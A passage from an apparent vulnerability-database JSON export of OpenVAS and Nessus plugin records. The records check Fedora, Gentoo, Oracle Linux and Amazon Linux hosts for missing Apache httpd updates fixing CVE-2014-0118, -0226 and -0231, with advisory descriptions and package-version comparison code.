"description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-07-28T00:00:00", "id": "OPENVAS:1361412562310868036", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868036", "type": "openvas", "title": "Fedora Update for httpd FEDORA-2014-8742", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for httpd FEDORA-2014-8742\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868036\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-28 16:27:42 +0530 (Mon, 28 Jul 2014)\");\n script_cve_id(\"CVE-2014-0231\", \"CVE-2014-0117\", \"CVE-2014-0118\", \"CVE-2014-0226\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for httpd FEDORA-2014-8742\");\n script_tag(name:\"affected\", value:\"httpd on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-8742\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135744.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.10~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2013-5704", "CVE-2014-0118", "CVE-2014-0226"], "description": "Gentoo Linux Local Security Checks GLSA 201504-03", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121370", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121370", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201504-03", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201504-03.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121370\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:46 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201504-03\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Apache HTTP Server. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201504-03\");\n script_cve_id(\"CVE-2013-5704\", \"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201504-03\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-servers/apache\", unaffected: make_list(\"ge 2.2.29\"), vulnerable: make_list(\"lt 2.2.29\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-09-25T08:56:08", "description": "From Red Hat Security Advisory 2014:0920 :\n\nUpdated httpd packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling the updated packages, the httpd daemon will be restarted\nautomatically.", "edition": 21, "published": "2014-07-24T00:00:00", "title": "Oracle Linux 5 / 6 : httpd (ELSA-2014-0920)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "modified": "2014-07-24T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:mod_ssl", "p-cpe:/a:oracle:linux:httpd-manual", "p-cpe:/a:oracle:linux:httpd-tools"], "id": "ORACLELINUX_ELSA-2014-0920.NASL", "href": "https://www.tenable.com/plugins/nessus/76744", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:0920 and \n# Oracle Linux Security Advisory ELSA-2014-0920 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76744);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_xref(name:\"RHSA\", value:\"2014:0920\");\n\n script_name(english:\"Oracle Linux 5 / 6 : httpd (ELSA-2014-0920)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2014:0920 :\n\nUpdated httpd packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling the updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-July/004243.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-July/004246.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-87.0.1.el5_10\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-87.0.1.el5_10\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-87.0.1.el5_10\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-87.0.1.el5_10\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"httpd-2.2.15-31.0.1.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-devel-2.2.15-31.0.1.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-manual-2.2.15-31.0.1.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-tools-2.2.15-31.0.1.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mod_ssl-2.2.15-31.0.1.el6_5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ssl\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:18:53", "description": "A race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)", "edition": 24, "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : httpd (ALAS-2014-388)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:mod_ssl", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:httpd-tools", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-388.NASL", "href": "https://www.tenable.com/plugins/nessus/78331", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-388.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78331);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_xref(name:\"ALAS\", value:\"2014-388\");\n script_xref(name:\"RHSA\", value:\"2014:0920\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2014-388)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-388.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.27-1.3.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.27-1.3.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.27-1.3.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.27-1.3.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.27-1.3.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.27-1.3.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:18:53", "description": "A race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)", "edition": 24, "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : httpd24 (ALAS-2014-389)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:mod24_ssl", "p-cpe:/a:amazon:linux:httpd24-manual", "p-cpe:/a:amazon:linux:mod24_ldap", "p-cpe:/a:amazon:linux:mod24_proxy_html", "p-cpe:/a:amazon:linux:httpd24-tools", "p-cpe:/a:amazon:linux:httpd24-debuginfo", "p-cpe:/a:amazon:linux:mod24_session", "p-cpe:/a:amazon:linux:httpd24-devel", "p-cpe:/a:amazon:linux:httpd24", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-389.NASL", "href": "https://www.tenable.com/plugins/nessus/78332", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-389.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78332);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_xref(name:\"ALAS\", value:\"2014-389\");\n\n script_name(english:\"Amazon Linux AMI : httpd24 (ALAS-2014-389)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-389.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd24' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-debuginfo-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-devel-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-manual-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-tools-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_ldap-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_proxy_html-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_session-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_ssl-2.4.10-1.59.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd24 / httpd24-debuginfo / httpd24-devel / httpd24-manual / etc\");\n}\n", "cvss": {"score": 6.8, "vector": 